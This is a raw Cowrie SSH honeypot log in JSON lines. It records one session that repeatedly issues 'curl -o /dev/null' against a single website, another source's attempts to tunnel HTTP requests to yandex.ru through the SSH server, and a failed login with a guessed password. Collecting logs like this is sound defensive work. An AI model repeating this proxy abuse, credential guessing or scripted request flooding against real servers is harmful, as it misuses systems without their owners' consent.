{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.876160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.877360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.914920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.915802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.955281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.956398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.44.55","dst_port":80,"src_ip":"193.105.134.95","src_port":22091,"message":"direct-tcp connection request to 77.88.44.55:80 from 127.0.0.1:22091","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.974850Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.003943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.004938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.44.55","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.44.55:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.019730Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.048076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.049002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.085564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.086751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.123884Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.124776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"193.105.134.95","src_port":14187,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14187","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.151016Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.162178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.163039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.195805Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.201284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.202139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.239232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.240174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.242110Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.278617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.279552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.323280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.324193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.360601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.361580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.410744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.411689Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.460101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.461043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.498340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.499954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.536389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.537379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.574099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.575020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.611407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.612758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.656714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.657738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.694584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.695626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.732406Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.733253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.769566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.770549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.817543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.818499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.854880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.855826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.894034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.895072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.931849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.932800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:26.969589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:26.970485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.007269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.008218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.046609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.048148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.085781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.086870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.124491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.125504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.162407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.163748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.212291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.213446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.252818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.253760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.290910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.291812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.328408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.329328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28795,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c304f98ee6b","protocol":"ssh","message":"New connection: 212.227.125.160:28795 (1.2.3.4:22) [session: 4c304f98ee6b]","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.363575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.364312Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.370424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.371320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.424376Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.497837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.498921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.535788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.536945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.574108Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.575061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.611394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.612367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.649403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.650607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.699106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.700062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.738441Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.739413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beaks","message":"login attempt [admin/beaks] failed","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.750390Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.776838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.777759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.817514Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.820437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.821473Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.859859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.862063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.902715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.903610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.955704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.956657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:27.993453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:27.994721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.032000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.032916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.077178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.078177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.128654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.129903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
